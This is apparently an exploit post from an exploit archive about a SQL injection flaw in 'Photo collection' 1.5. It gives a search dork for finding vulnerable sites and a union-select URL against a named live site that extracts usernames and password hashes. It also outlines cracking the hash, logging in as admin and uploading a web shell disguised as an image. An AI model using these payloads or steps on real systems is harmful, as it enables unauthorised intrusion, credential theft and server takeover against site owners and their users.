Photo Collection version 1.5 suffers from a remote SQL injection vulnerability.
1ead0ad92540a0c9df427025a14eccd48ed284427145b5103d2e34cbbcb26d63-------------------- IN The NAme OF God --------------------
-====Photo collection Remote Sql Injection Vulnerability====-
# Exploit Title: Photo collection Remote Sql Injection Vulnerability
# Exploit Author: Mr.XpR
# Tested on: BackTrack , 7 , Redhat
# Version : 1.5
# MAil : No0pm@yahoo.com
-====Dork====-
inurl:index.php?Blog=*&user_id=
intext: Copyright (c) 2010-2012 by photo collection. All rights reserved!
-====Exploit====-
http://Site.C0M/index.php?Blog=11&user_id=[Sqli]
-====Example====-
http://www.dakghor.com/index.php?Blog=11&user_id=-9999+union+select+group_concat%28user_name,0x3a,user_password%29+from+be_users--
-====information====-
Crack Joomla Hash IN ~~~ > http://www.md5decrypter.co.uk/
Admin Page ~~~~~~~~~> Front PAge With Email And PAssword
Login To panel :D
Click <<--- Add Profile Picture or Add Picture -----Upload She3ll~~~> Sh3ll.jpg 0r Sh3ll.php.Jpg
And Load From http://www.xxxxx.com/images/users/Sh3ll.jpg
-====Tnx To====-
Persian Gulf For Ever ~~~~ > W3 Are Persian Hackerz
MR.XpR - MMT - Samim.s - FarbodEZRaeL - Inj3Ctor - Black.Viper - UnknowN
Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...
And All IraNHAck Security Team Members
~~~~~~~~~~~~~~~~~~~~~~>> IRANHaCK.ORG
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed